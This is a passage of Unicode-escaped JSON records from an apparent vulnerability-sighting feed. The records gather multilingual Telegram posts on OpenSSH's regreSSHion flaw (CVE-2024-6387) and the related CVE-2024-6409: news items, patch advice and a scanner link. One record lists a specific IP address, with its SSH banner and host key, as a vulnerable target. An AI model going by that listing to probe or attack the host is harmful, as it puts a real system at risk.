\u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e \u043f\u043e \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u043e\u0446\u0435\u043d\u043a\u0435 \u0418\u0411-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430, \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f regreSSHion \u0441\u043e\u043f\u0440\u044f\u0436\u0435\u043d\u0430 \u0441 \u0431\u043e\u043b\u044c\u0448\u0438\u043c\u0438 \u0442\u0440\u0443\u0434\u043d\u043e\u0441\u0442\u044f\u043c\u0438.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2024-07-05T18:10:35.000000Z"}, {"uuid": "23313d2c-7647-48d5-996b-98e0e14d1fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/kasperskyb2b/1322", "content": "\ud83d\ude92 \u0418\u044e\u043b\u044c \u0438 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0441 RCE \u0432 OpenSSH \ud83d\udd25\n\nCVE-2024-6387 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0441 8.5p1 \u043f\u043e 9.7p1 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0433\u0440\u0435\u0441\u0441\u0438\u0435\u0439 \u0441\u0442\u0430\u0440\u043e\u0433\u043e \u0434\u0435\u0444\u0435\u043a\u0442\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e  CVE-2006-5051.\n\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0431\u0435\u0437 \u0432\u0441\u044f\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root \u043d\u0430 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 glibc, \u043d\u043e \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0435\u043c\u0443 \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0441\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c race condition \u0438 \u0432\u044b\u0438\u0433\u0440\u0430\u0442\u044c \u0433\u043e\u043d\u043a\u0443. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043d\u0430\u0448\u0435\u0434\u0448\u0438\u0435 \u0438 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u0433\u043b\u0430\u0441\u0438\u0432\u0448\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u043e\u0431\u044b\u0447\u043d\u043e \u044d\u0442\u043e \u0443\u0434\u0430\u0451\u0442\u0441\u044f \u0437\u0430 \u0434\u0435\u0441\u044f\u0442\u044c \u0442\u044b\u0441\u044f\u0447 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u2014 \u043f\u0440\u0438 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 OpenSSH \u043d\u0430 \u0430\u0442\u0430\u043a\u0443 \u0443\u0445\u043e\u0434\u0438\u0442 6-8 \u0447\u0430\u0441\u043e\u0432.\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Censys \u0438 Shodan, \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u043e\u043a\u043e\u043b\u043e 14 \u043c\u043b\u043d \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0445\u043e\u0441\u0442\u043e\u0432.\n\n\u0427\u0442\u043e\u0431\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u043c\u044f regreSSHion, \u043d\u0435 \u0441\u043d\u0438\u043b\u0430\u0441\u044c \u043f\u043e \u043d\u043e\u0447\u0430\u043c \u043a\u0430\u043a Log4shell, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c OpenSSH, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c \u0441 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c \u043d\u0430 \u0431\u0430\u0437\u0435 OpenSSH \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c. \u0421\u0442\u043e\u0438\u0442 \u043f\u043e\u043c\u043d\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u043d\u043e \u0438 \u043c\u043d\u043e\u0433\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 IoT.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2024-07-01T16:07:33.000000Z"}, {"uuid": "aae581a8-47ac-4249-9f4a-5d8726dbecbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/nlFRqOlBDD33W2M7ls1ugPfagy7OcXW07rzgaDuDJb5gGR4", "content": "", "creation_timestamp": "2024-07-04T20:51:24.000000Z"}, {"uuid": "99c38723-33ae-4d29-98a1-97b029f156d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/CyberBulletin/21", "content": "\u26a1A critical OpenSSH flaw (CVE-2024-6387) allows unauthenticated remote code execution on glibc-based Linux systems. 14 million servers at risk.", "creation_timestamp": "2024-07-03T10:40:05.000000Z"}, {"uuid": "423d0a35-f7ff-4ffa-9900-bd6d79983843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/IRANGOBLIN_ir/305", "content": "\ud83c\udd95\ud83c\udd95\ud83c\udd95\ud83c\udd95\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\ud83d\udcdd\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\ud83d\udcdd\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 Openwall \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041f\u0435\u0441\u043b\u044f\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043d\u043e\u0432\u044b\u0439 \u0431\u0430\u0433, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 regreSSHion. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 privsep \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409 (7 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS).\n\n\ud83d\udcdd\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0443\u0436\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-6409. Canonical \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Ubuntu \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0432\u043e\u043b\u043d\u043e\u0432\u0430\u0442\u044c\u0441\u044f, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0438 \u043e\u0434\u043d\u0430 \u0438\u0437 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0435 \u0440\u0435\u043b\u0438\u0437\u044b.\n\n\n\n\ud83c\uddf7\ud83c\uddfa \u0427\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e\n\ud83c\uddfa\ud83c\uddf8 Read Full\n\n\ud83c\udf10 \u041e\u0431\u043c\u0435\u043d\u043d\u0438\u043a \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b: \n\n\ud83d\udcac \u2014 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0447\u0430\u0442\n\ud83d\udcbb \u0412\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0438 \u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442\u0441\u044f AI:", "creation_timestamp": "2024-07-20T08:43:05.000000Z"}, {"uuid": "6cbc7d50-37ea-4d22-b5ad-5a00d686bcb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7826", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis Go program scans targets for CVE-2024-6387 in OpenSSH, categorizing servers by vulnerability status and port availability.\nURL\uff1ahttps://github.com/SecWithMoh/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T09:55:58.000000Z"}, {"uuid": "f75afca7-eac3-4174-bcf4-d20347d176e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/ptescalator/240", "content": "\u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e OpenSSH \u0432 2024 \u0433\u043e\u0434\u0443 \ud83d\udeaa\n\n\u0412\u0437\u0433\u043b\u044f\u043d\u0435\u043c \u043d\u0430 \u0442\u0430\u0439\u043c\u043b\u0430\u0439\u043d:\n\n\u2022 \u0412\u0435\u0441\u043d\u0430. \u0411\u044d\u043a\u0434\u043e\u0440 \u0432 xz-utils (CVE-2024-3094). \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0435\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0431\u044b\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 systemd, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 OpenSSH \u0435\u0441\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044c liblzma, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0430\u044f \u0432 \u043d\u0435\u043c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438 \u0441\u0430\u043c\u0438\u043c OpenSSH \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f (\u0442\u043e \u0435\u0441\u0442\u044c \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0435\u0447\u044c \u043e\u0431 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u044d\u0442\u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432, \u0430 \u043d\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u043d\u0430 OpenSSH).\n\n\u2022 \u0418\u044e\u043b\u044c. \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c \u043d\u0430 \u0431\u0430\u0437\u0435 glibc, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 regreSSHion (CVE-2024-6387) \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u043f\u0435\u0440\u0435\u0440\u043e\u0436\u0434\u0435\u043d\u043d\u0443\u044e CVE-2006-5051.\n\n\u2022 \u0412\u0441\u0435 \u0442\u043e\u0442 \u0436\u0435 \u0438\u044e\u043b\u044c. \u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u043e\u0436\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409.\n\n\u2022 \u0410\u0432\u0433\u0443\u0441\u0442. \u0415\u0449\u0435 \u043e\u0434\u043d\u0430, \u0443\u0436\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u0430\u044f \u0434\u043b\u044f FreeBSD, CVE-2024-7589.\n\n\u2754 \u0427\u0442\u043e \u044d\u0442\u043e \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u044b\u043b\u043e\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438\u00bb \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE \u043d\u0430 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, regreSSHion \u2014 \u0433\u043b\u0430\u0432\u043d\u044b\u0439 \u0431\u0430\u0433 (\u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 sshd) \u2014 \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 SSH-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 glibc. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043e\u0441\u043e\u0431\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0430 \u0438 \u0434\u043b\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e). \u041d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e PoC \u043d\u0435\u0442 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440.\n\n\u041c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f, \u0442\u0430\u043a \u043b\u0438 \u043e\u043f\u0430\u0441\u043d\u044b \u044d\u0442\u0438 \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0438 \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0432 sshd \u043f\u0440\u0438\u0437\u0432\u0430\u043d\u044b \u043d\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u043b\u0438 \u0445\u043e\u0442\u044f \u0431\u044b \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u0443\u0449\u0435\u0440\u0431 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438. \u041f\u043e\u043f\u0443\u0442\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u043b\u0438 \u043e\u0431\u0437\u043e\u0440 \u0438 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 OpenSSH \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\ud83d\udd23 \u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u044d\u0442\u043e \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0431\u0430\u0437\u043e\u0439 \u0438 \u044d\u043a\u0441\u043a\u0443\u0440\u0441\u043e\u043c \u043d\u0430 30 \u0441\u0435\u043a\u0443\u043d\u0434 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435 \u043d\u0430 \u0425\u0430\u0431\u0440\u0435. Enjoy!\n\n#CVE #escvr\n@ptescalator", "creation_timestamp": "2025-01-30T08:33:54.000000Z"}, {"uuid": "ec1949aa-087c-4ff1-942a-a253716c29de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/ANONYMOUSACTIVIST/687", "content": "[VULNERABILITY] : CVE-2024-6387 {openssh}\n43.134.59.194\nAsia Pacific Network Information Center, Pty. Ltd.\nSingaporeSingapore, Singapore\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10\nKey type: ecdsa-sha2-nistp256\nKey: AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGD4cQkAvcbFnX71mbkyTeaY\nXWm+kxKl2+nb3RuHKfsD3hyPLnx5uuBcWJiDipWC4EZccsFic+N0QqohWS1DLL8=\nFingerprint: e1:2d:eb:32:30:93:0d:19:0e:3f:5c:81:f1:ac:65:ab", "creation_timestamp": "2024-10-13T15:48:37.000000Z"}, {"uuid": "05d6e90e-8b20-4355-b398-16253e337e6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/cvedetector/210", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6409 - A signal handler race condition vulnerability was\", \n  \"Content\": \"CVE ID : CVE-2024-6409 \nPublished : July 8, 2024, 6:15 p.m. | 26\u00a0minutes ago \nDescription : A signal handler race condition vulnerability was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. \nSeverity: 7.0 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-08T20:46:06.000000Z"}, {"uuid": "710681f9-faa8-473f-bcbc-8746b058a76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/9hTDM9ZZ27QBMWkCISLWyl4IXEELnKOLsFgVO8GiuBX6Qg", "content": "", "creation_timestamp": "2024-07-01T16:04:43.000000Z"}, {"uuid": "3a8e5bd0-9497-4a8c-b0b7-8c912a337530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/ViralCyber/3326", "content": "\ud83d\udd34\u0628\u06cc\u0634 \u0627\u0632 20.000 \u062a\u0627 IP \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2024-6387 \u06a9\u0647 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 OpenSSH \u0627\u0633\u062a \u0648 \u0627\u062e\u06cc\u0631\u0627 Publish \u0634\u062f\u0647 \u062f\u0631 \u0627\u06cc\u0631\u0627\u0646 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a. \n\u2796 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647\u200c\u0637\u0648\u0631 \u062e\u0627\u0635 \u062f\u0631 \u0633\u0631\u0648\u0631 sshd \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0647 \u062f\u0644\u06cc\u0644 \u06cc\u06a9 race condition \u062f\u0631 \u0647\u0646\u062f\u0644\u0631 \u0633\u06cc\u06af\u0646\u0627\u0644\u060c \u0628\u0647\u200c\u0648\u06cc\u0698\u0647 \u0647\u0646\u062f\u0644\u0631 `SIGALRM`\u060c \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f. \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0646\u0642\u0635 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0648 \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0628\u0627 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc root \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc 